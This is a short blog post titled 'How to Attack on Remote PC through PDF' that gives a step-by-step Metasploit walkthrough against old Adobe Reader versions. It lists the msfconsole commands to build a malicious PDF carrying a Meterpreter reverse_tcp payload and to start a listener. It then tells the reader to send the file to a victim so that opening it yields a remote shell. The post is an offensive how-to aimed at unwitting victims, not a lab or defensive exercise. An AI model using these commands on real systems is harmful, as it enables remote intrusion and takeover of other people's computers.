Sunday 13 January 2013

How to Attack on Remote PC through PDF

How to Attack on Remote PC through PDF



Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
This module exploits an array overflow in Adobe Reader and Adobe Acrobat. Affected versions include < 7.1.4, < 8.2, and < 9.3. By creating a specially crafted pdf that a contains malformed U3D data, an attacker may be able to execute arbitrary code.

Exploit Targets
Adobe Reader and Acrobat Professional prior to version 9.3
Acrobat prior to version 8.2
Adobe Reader 9.0.0

Requirement
Attacker: Backtrack 5
Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/windows/fileformat/adobe_u3d_meshdecl

Msf exploit (adobe_u3d_meshdecl)>set outpathpath /home/desktop

Msf exploit (adobe_u3d_meshdecl)>set payload windows/meterpreter/reverse_tcp

Msf exploit (adobe_u3d_meshdecl)>set lhost xxx.xxx.xxx (IP of Local Host)

Msf exploit (adobe_u3d_meshdecl)>exploit

After we successfully generate the malicious PDF, it will stored on your local computer
/root/.msf4/local/msf.pdf

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost xxx.xxx.xxx

exploit

Now send your msf.pdf files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer


Share this post
  • Share to Facebook
  • Share to Twitter
  • Share to Google+
  • Share to Stumble Upon
  • Share to Evernote
  • Share to Blogger
  • Share to Email
  • Share to Yahoo Messenger
  • More...

0 comments

:) :-) :)) =)) :( :-( :(( :d :-d @-) :p :o :>) (o) [-( :-? (p) :-s (m) 8-) :-t :-b b-( :-# =p~ :-$ (b) (f) x-) (k) (h) (c) cheer

 
© 2013 The Tips n Tricks
Designed by The Tips n Tricks
Posts RSSComments RSS
Back to top